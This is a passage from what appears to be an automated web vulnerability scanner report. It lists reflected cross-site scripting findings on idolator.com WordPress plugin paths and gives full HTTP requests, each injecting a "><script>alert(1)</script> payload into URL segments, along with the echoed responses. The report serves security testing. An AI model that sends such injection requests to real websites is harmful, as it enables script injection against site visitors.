GET /wp-content/plugins/wp-facebookconnect22af8"><script>alert(1)</script>b845d5fbef6/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:58 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-facebookconnect22af8\"><script>alert(1)</script>b845d5fbef6/xd_receiver.php" />
...[SNIP]...

4.153. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536a7"><script>alert(1)</script>2d1ae258ddb was submitted in the REST URL parameter 4. This input was echoed as 536a7\"><script>alert(1)</script>2d1ae258ddb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-facebookconnect/xd_receiver.php536a7"><script>alert(1)</script>2d1ae258ddb HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:16 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php536a7\"><script>alert(1)</script>2d1ae258ddb" />
...[SNIP]...

4.154. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 411a7"><script>alert(1)</script>8486c1597cf was submitted in the REST URL parameter 1. This input was echoed as 411a7\"><script>alert(1)</script>8486c1597cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content411a7"><script>alert(1)</script>8486c1597cf/plugins/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:32:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:32:55 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content411a7\"><script>alert(1)</script>8486c1597cf/plugins/wp-polls/polls-css.css?ver=2.50" />
...[SNIP]...

4.155. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef64c"><script>alert(1)</script>8be803bc4d3 was submitted in the REST URL parameter 2. This input was echoed as ef64c\"><script>alert(1)</script>8be803bc4d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsef64c"><script>alert(1)</script>8be803bc4d3/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:07 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsef64c\"><script>alert(1)</script>8be803bc4d3/wp-polls/polls-css.css?ver=2.50" />
...[SNIP]...

4.156. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb93"><script>alert(1)</script>85680b4efea was submitted in the REST URL parameter 3. This input was echoed as 6eb93\"><script>alert(1)</script>85680b4efea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls6eb93"><script>alert(1)</script>85680b4efea/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:21 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls6eb93\"><script>alert(1)</script>85680b4efea/polls-css.css?ver=2.50" />
...[SNIP]...

4.157. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4e8"><script>alert(1)</script>cade8732198 was submitted in the REST URL parameter 4. This input was echoed as ed4e8\"><script>alert(1)</script>cade8732198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-css.cssed4e8"><script>alert(1)</script>cade8732198?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:32 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls/polls-css.cssed4e8\"><script>alert(1)</script>cade8732198?ver=2.50" />
...[SNIP]...

4.158. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e61a3"><script>alert(1)</script>de04ee79223 was submitted in the REST URL parameter 1. This input was echoed as e61a3\"><script>alert(1)</script>de04ee79223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contente61a3"><script>alert(1)</script>de04ee79223/plugins/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:32:59 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:32:59 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contente61a3\"><script>alert(1)</script>de04ee79223/plugins/wp-polls/polls-js.js?ver=2.50" />
...[SNIP]...

4.159. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8040"><script>alert(1)</script>684a5586fea was submitted in the REST URL parameter 2. This input was echoed as d8040\"><script>alert(1)</script>684a5586fea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsd8040"><script>alert(1)</script>684a5586fea/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsd8040\"><script>alert(1)</script>684a5586fea/wp-polls/polls-js.js?ver=2.50" />
...[SNIP]...

4.160. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd48"><script>alert(1)</script>d9a2b5b9c97 was submitted in the REST URL parameter 3. This input was echoed as afd48\"><script>alert(1)</script>d9a2b5b9c97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-pollsafd48"><script>alert(1)</script>d9a2b5b9c97/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:26 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-pollsafd48\"><script>alert(1)</script>d9a2b5b9c97/polls-js.js?ver=2.50" />
...[SNIP]...

4.161. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 945b8"><script>alert(1)</script>d485dfaae3 was submitted in the REST URL parameter 4. This input was echoed as 945b8\"><script>alert(1)</script>d485dfaae3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-js.js945b8"><script>alert(1)</script>d485dfaae3?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:37 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35921
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls/polls-js.js945b8\"><script>alert(1)</script>d485dfaae3?ver=2.50" />
...[SNIP]...

4.162. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcf7c"><script>alert(1)</script>c9f57ca000c was submitted in the REST URL parameter 1. This input was echoed as dcf7c\"><script>alert(1)</script>c9f57ca000c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentdcf7c"><script>alert(1)</script>c9f57ca000c/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:02 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contentdcf7c\"><script>alert(1)</script>c9f57ca000c/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.163. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d4e"><script>alert(1)</script>827c3f95aec was submitted in the REST URL parameter 2. This input was echoed as 24d4e\"><script>alert(1)</script>827c3f95aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins24d4e"><script>alert(1)</script>827c3f95aec/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins24d4e\"><script>alert(1)</script>827c3f95aec/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.164. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea543"><script>alert(1)</script>b7d35424d0 was submitted in the REST URL parameter 3. This input was echoed as ea543\"><script>alert(1)</script>b7d35424d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-playerea543"><script>alert(1)</script>b7d35424d0/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
